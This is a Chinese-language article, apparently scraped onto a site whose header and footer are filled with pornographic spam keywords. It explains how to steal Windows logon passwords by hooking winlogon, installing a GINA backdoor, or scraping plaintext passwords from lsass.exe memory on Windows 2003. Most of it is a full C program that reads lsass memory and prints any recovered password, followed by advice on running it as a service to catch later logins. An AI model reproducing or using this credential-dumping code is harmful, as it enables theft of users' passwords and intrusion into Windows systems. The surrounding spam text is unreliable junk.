国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

如何在Windows 2003中得到登陸密碼

瀏覽:2日期:2023-11-20 17:59:31
在所有NT系統中,都是有幾種方法可以得到登陸用戶的密碼的。我知道的三種方法可以達到目的。

1.hook了winlogon中幾個函數,網上也有這類型的程序,叫winlogonhijack的項目在rootkit.com中有提供,不過那個項目只對本地登陸用戶有效,遠程登陸用戶無效。

2.使用Gina和winlogon進行套接,只要對某些函數執行自己的記錄密碼的代碼,就可以將密碼記錄下來,穩定性高,而且對本地或遠程登陸都有效,不過現存的gina后門程序在XP或2003中都有些函數沒有被導出過,主要因為xp和2003等在winlogon中加入了新的函數。

3.直接讀取內存數據得到明文密碼。在NT 4.0/2K中,早就有程序findpass可以直接讀到winlogon進程中的內存數據而直接得到登陸用戶密碼,因為在NT4.0和2K中,帳號的信息,包括域名,帳號和密碼都是有規律地在winlogon內存中的特定地址中,所以可以很簡單就得到。但在XP和2003系統中,這樣方法是無效的了,似乎我們是沒有辦法直接讀出明文地址了。下面我們就來談談如何象findpass在NT 4.0和2K在,在server 2003中得到登陸用戶的密碼。

雖然XP和2003是不象以前的NT系統那樣將登陸用戶信息保存在winlogon進程的內存地址內,但是基Lsass進程對于要處理些信息時,需要得到明文的登陸用戶密碼,所以登陸用戶的密碼會在Lsass進程中出現(微軟沒有將密碼在Lsass進程中進行加密,微軟的說法是因為Lsass需要得到明文的密碼,就算將密碼加密,也都只能用可逆的方法加密,只要跟蹤lsass的操作,一樣可以得到明文密碼,所以微軟使用了比較懶惰的方法,可能也是為了加快響應速度,所以將明文密碼更是放在lsass進程內存內)。說到這里,大家心里都清楚了,登陸用戶的密碼是在lsass進程的內存中。對,就是這么一回事,但是要得到這個明文密碼,真是象使用NT 4.0和2K下的findpass那樣容易嗎?事實上并不是那么容易,因為以下幾個原因:

A.密碼存放在lsass進程中的內存地址是沒有規律的

B.密碼有可能被最后登陸的用戶復蓋(例如管理員abc從本地登陸,然后管理員bbb從遠程登陸,然后管理員bbb注銷終端,存放在lsass.exe進程內存中的密碼,還是管理員bbb的密碼),又或者用戶登陸后,然后注銷了,那么我們就算得到了密碼,也不知道是哪個用戶的密碼。

C.密碼前后的數據也是沒有規律的,如果有規律,例如密碼前的數據,一定是有一段全是01字符的數據段,那么定位密碼就簡單。

原因A和C都給我們帶來定位密碼的困難,原B就帶來不能確定密碼和帳號對應的問題.看來微軟在新的系統還是做過點功夫。不過我們是不會放棄的,就算是碰碰運氣,也看能不能得到密碼,反正就算失敗,也沒什么關系。

最后的代碼,是我寫來測試是不是能在2003的系統中得到登際用戶的密碼,結果也正好象我們上面的分析一樣(當然了,上面的結果是用這程序測測得到的)。成功率當然不高,因為受太多原因所影響,定位密碼上的困難或者無法定位,或者得到不是密碼的信息等等的原因,都令失敗率顯得相當高,不過總還是一種方法,或者將來有人可以準確定位到,那就是令人高興了。雖然說失敗率高,但在一種情況下,成功率卻是很高的,那就是管理員只是在本地或終端中登陸了,以后再沒有用戶從本地或終端登陸過,而且管理員也沒有鎖上過系統,那么成功率就會是相當高的了。

提高成功率的兩種做法:

1.程序直接寫成服務,定時檢查本地或遠程登陸(其實沒什么分別),當檢測到登陸后,去搜索lsass進程內存,嘗試得到密碼。

2.程序模擬一個登陸(使用LogonUser()就能搞定),因為使用LogonUser()這個API,你要提供帳號名和對應的正確的密碼,才可以成功,然后你就可以去搜索lsass進程內存。因為知道密碼是什么,我們就能定位到密碼是保存在什么地方。因為登陸用戶的密碼都是保存在同一個地址或相離不遠的地址中,模擬登陸和搜索,可以先定位以后登陸的用戶的密碼會大約保存在什么位置。

無論怎說,三種方法中,最穩定,最安全的方法還是使用Gina那種方法.Hijack了winlogn一些API的方法,畢竟是改動了系統的東西,對系統的穩定性來說,會有考驗,直接搜索lsass進程內存的方法呢,雖說也是困難,但準確性,成功率卻又是低。

下面的代碼使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass內存中'LocalSystem Remote Procedure'這個字符串,因為在相當多的測試中,密碼都是保存在有這個字符串的地址后一點的位置中,當然了,很多系統并沒有這個字符串,或者就算有,我們得到的都是錯誤的密碼。

代碼: //******************************************************************************** // Version: V1.0 // Coder: WinEggDrop // Date Release: 12/15/2004 // Purpose: To Demonstrate Searching Logon User PassWord On 2003 Box,The Method // Used Is Pretty Unwise,But This May Be The Only Way To RevIEw The // Logon User's Password On Windows 2003. // Test PlatForm: Windows 2003 // Compiled On: VC++ 6.0 //******************************************************************************** #include #include #include

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char Password[MAX_PATH] = ; // Store The Found Password

// Function ProtoType Declaration //------------------------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID); int Search(char *Buffer,const UINT nSize); DWORD GetLsassPID(); BOOL Is2003(); //------------------------------------------------------------------------------------------------------ // End Of Fucntion ProtoType Declaration

int main() { DWORD PID = 0; printf('Windows 2003 Password Viewer V1.0 By WinEggDropnn');

if (!Is2003()) // Check Out If The Box Is 2003 { printf('The Program Can't Only Run On Windows 2003 Platformn'); return -1; }

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom { return -1; }

FindPassword(PID); // Find The Password From Lsass.exe Memory return 0; } // End main()

//------------------------------------------------------------------------------------ // Purpose: Search The Memory & Try To Get The Password // Return Type: int // Parameters: // In: char *Buffer --> The Memory Buffer To Search // Out: const UINT nSize --> The Size Of The Memory Buffer // Note: The Program Tries To Locate The Magic String 'LocalSystem Remote Procedure', // Since The Password Is Near The Above Location,But It's Not Always True That // We Will Find The Magic String,Or Even We Find It,The Password May Be Located // At Some Other Place.We Only Look For Luck //------------------------------------------------------------------------------------ int Search(char *Buffer,const UINT nSize) { UINT OffSet = 0; UINT i = 0; UINT j = 0 ; UINT Count = 0; if (Buffer == NULL) { return -1; } for (i = 0 ; i < nSize ; i++) { /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate The Magic String,We Have To Do It Manually And Slowly */ if (Buffer == 'L') { OffSet = 0; if (strnicmp(&Buffer[i + OffSet],'LocalSystem',strlen('LocalSystem')) == 0) { OffSet += strlen('LocalSystem') + 1; if (strnicmp(&Buffer[i + OffSet],'Remote',strlen('Remote')) == 0) { OffSet += strlen('Remote') + 1; if (strnicmp(&Buffer[i + OffSet],'Procedure',strlen('Procedure')) == 0) { OffSet += strlen('Procedure') + 1; if (strnicmp(&Buffer[i + OffSet],'Call',strlen('Call')) == 0) { i += OffSet; break; } } } } } }

if (i < nSize) { ZeroMemory(Password,sizeof(Password)); for (; i < nSize ; i++) { if (Buffer == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0) { /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In That Way */ j = i + 7; for (; j < nSize; j += 2) { if (Buffer[j] > 0) { Password[Count++] = Buffer[j]; } else { break; } } return i + 7; // One Flag To Indicate We Find The Password } } } return -1; // Well,We Fail To Find The Password,And This Always Happens } // End Search

//------------------------------------------------------------------------------------ // Purpose: To Get The Lsass.exe PID // Return Type: DWORD // Parameters: None //------------------------------------------------------------------------------------ DWORD GetLsassPID() { HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if( hProcessSnap == INVALID_HANDLE_VALUE ) { printf('Fail To Create Snap Shotn'); return 0; }

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap, &pe32)) { CloseHandle(hProcessSnap); // Must clean up the snapshot object! return 0; }

do { if (strcmpi(pe32.szExeFile,'Lsass.EXE') == 0) { PID = pe32.th32ProcessID; break; } }while(Process32Next( hProcessSnap, &pe32));

CloseHandle( hProcessSnap); return PID; } // End GetLsassPID()

//------------------------------------------------------------------------------------ // Purpose: To Find The Password // Return Type: BOOLEAN // Parameters: // In: DWORD PID -> The Lsass.exe's PID //------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID) { HANDLE hProcess = NULL; char Buffer[5 * 1024] = ; DWORD ByteGet = 0; int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process if (hProcess == NULL) { printf('Fail To Open Processn'); return FALSE; }

if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe { printf('Fail To Read Memoryn'); CloseHandle(hProcess); return FALSE; }

CloseHandle(hProcess);

Found = Search(Buffer,ByteGet); // Search The Password if (Found >= 0) // We May Find The Password { if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not { printf('Found Password At #0x%x -> '%s'n',Found + BaseAddress,Password); } } else { printf('Fail To Find The Passwordn'); } return TRUE; } // End FindPassword

//------------------------------------------------------------------------------------ // Purpose: Check If The Box Is Windows 2003 // Return Type: BOOLEAN // Parameters: None //------------------------------------------------------------------------------------ BOOL Is2003() { OSVERSIONINFOEX osvi; BOOL b0sVersionInfoEx; ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi))) { osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); } return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2); } // End Is2003() // End Of File

附件程序相當于密碼定位程序,用來測試在lsass內存中搜索指定的字符串或模擬登陸的密碼.

用法:

1.locator 字符串 -> 在lsass進程內存中搜索指定的那個'字符串',返回確定的位置

2.Locator 用戶名 密碼 -> 在系統中建立一個參數指定的用戶,并進行模擬登陸,然后搜索'密碼'在lsass進程內存中的位置,生成的帳戶程序運行完后會自動刪除。

標簽: Windows系統
主站蜘蛛池模板: 五月桃花网婷婷亚洲综合 | 青青久草| 久久久亚洲国产精品主播 | 久草手机在线 | 国产精品自拍在线观看 | 女同日韩互慰互摸在线观看 | 成年女人免费又黄又爽视频 | 国产欧美在线观看不卡 | 国内亚州视频在线观看 | 国产一级影片 | 亚州三级| 欧美嫩交 | 成人高清在线观看播放 | 日韩精品在线看 | 96精品视频在线播放免费观看 | 久久精品a一国产成人免费网站 | 欧美一区亚洲二区 | 国产成人在线视频观看 | 成人在线91| 中国一级片免费看 | 欧美成人看片一区二区三区 | 国内国外精品一区二区 | www.网站黄网站 | 国产在线精品成人一区二区三区 | 国产a毛片 | 免费看a毛片 | 毛片直接看 | 国产真人毛片一级视频 | 午夜精品尤物福利视频在线 | 国产成人性色视频 | 亚欧美视频 | 亚洲免费中文 | 成人在线播放 | 亚洲国产2017男人a天堂 | 国产在线精品一区二区高清不卡 | 手机看片国产在线 | 亚洲免费视 | 怡红院视频在线观看 | 亚洲 欧美 视频 | 久草在线国产 | 婷婷在线成人免费观看搜索 |